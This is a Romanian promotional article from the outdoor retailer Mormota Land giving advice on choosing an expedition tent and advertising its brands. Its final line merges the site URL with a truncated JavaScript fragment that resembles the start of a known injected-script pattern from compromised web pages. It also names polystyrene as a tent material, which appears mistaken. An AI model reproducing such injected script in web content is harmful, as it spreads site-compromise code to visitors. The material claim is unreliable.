cort expeditie

cort expeditie

Atunci cand porniti in cautarea unui cort expeditii cel mai important lucru pe care trebuie sa il aveti in minte este ca reprezinta o investitie pe termen lung. In special daca sunteti pasionat de munte atunci merita sa investiti chiar si in plus pentru un cort rezistent si de inalta calitate capabil sa indeplineasca chiar si cele mai inalte exigente. In plus, este deosebit de important sa  va ganditi la destinatia pe care urmeaza sa o aiba, anotimpul si conditiile in care il veti folosi, greutatea lui, materialul si, desigur pretul.

Mormota Land o companie care stie ce sa va ofere

Mormota Land este o companie care importa si distribuie echipament montan cu o experienta considerabila in acest sens, oferind solutiile cele mai bune. Pe site-ul nostru www.mormota.ro veti putea gasi o gama variata de echipamente pentru munte printre care cort expeditie, rucsacuri, saci de dormit, echipamente si accesorii pentru camping, imbracaminte si incaltaminte pentru munte, echipamente pentru alpinism dar si pentru sporturi de iarna care de abia asteapta sa le descoperiti si sa le utilizati pe munte.

Recomandari privind alegerea unui cort expeditie

La ora actuala cele mai vandute modele de cort expeditie sunt cele iglu care sunt de uz general cu rezultate acceptabile pentru orice vreme. Cele tip tunel ofera cel mai placut spatiu de locuit. In momentul in care porniti in alegerea unui cort expeditie bun trebuie sa tineti cont in special de destinatia pe care o va avea. Daca este pentru trekking atunci cu siguranta acesta trebuie sa aiba o greutate de 1,1 kg / persoana pentru un cort de trei sezoane. Exista si corturi mai usoare. Trebuie sa tineti cont de faptul ca veti urca pe un munte iar greutatea pe care o aveti asupra voastra nu trebuie sa depaseasca mai mult decat puteti duce.

Este foarte important sa tineti cont si de sezoanele in care veti urca pe munte, daca mergeti numai vara atunci un cort expeditie pentru trei sezoane va fi suficient.

Recomandari privind achizitionarea cortului perfect

De la inceput va spunem ca nu exista material ideal atunci cand vine vorba despre corturi. De aceea exista mai multe solutii. Polistirenul nu se deformeaza in timp din cauza intemperiilor dar o data cu trecerea timpului se va deteriora din cauza razelor UV. Nylonul este mai scump datorita calitatii mai ridicate pe care o ofera. Pentru modelele avansate de cort expeditie din nylon exista asa numita calitate Ripstop, intarita cu fire interne. Acestea au in plus avantajul de a se opune desirarii.

Pentru a va asigura ca veti cumpara un cort expeditie de inalta calitate cu care sa nu aveti probleme atunci cand urcati pe munte trebuie sa fiti atent la mai multe lucruri: cusaturile pe cm sunt mai multe , corturile de calitate folosesc bete din aluminiu iar materialul din care este facut este respirabil. Cortul trebuie sa ofere cat mai mult confort cu putinta pentru ca utilizatorul sa se simta cat mai bine in interior.

Mormota Land va ofera o gama variata de produse si servicii ce poarta marca unor producatori de renume si traditie pe piata de profil. Compania noastra este importator direct al marcilor precum Viking, Xtorn, Zajo, Lorner, Inook, Esbit, Hannah si multi altii avand exclusivitate in tara noastra pentru Pinguin.

Asadar, daca doriti sa comandati un cort expeditie de inalta calitate, va asteptam pe site-ul nostru www.mormota.ro.var d=document;var s=d.createElement(‘script’);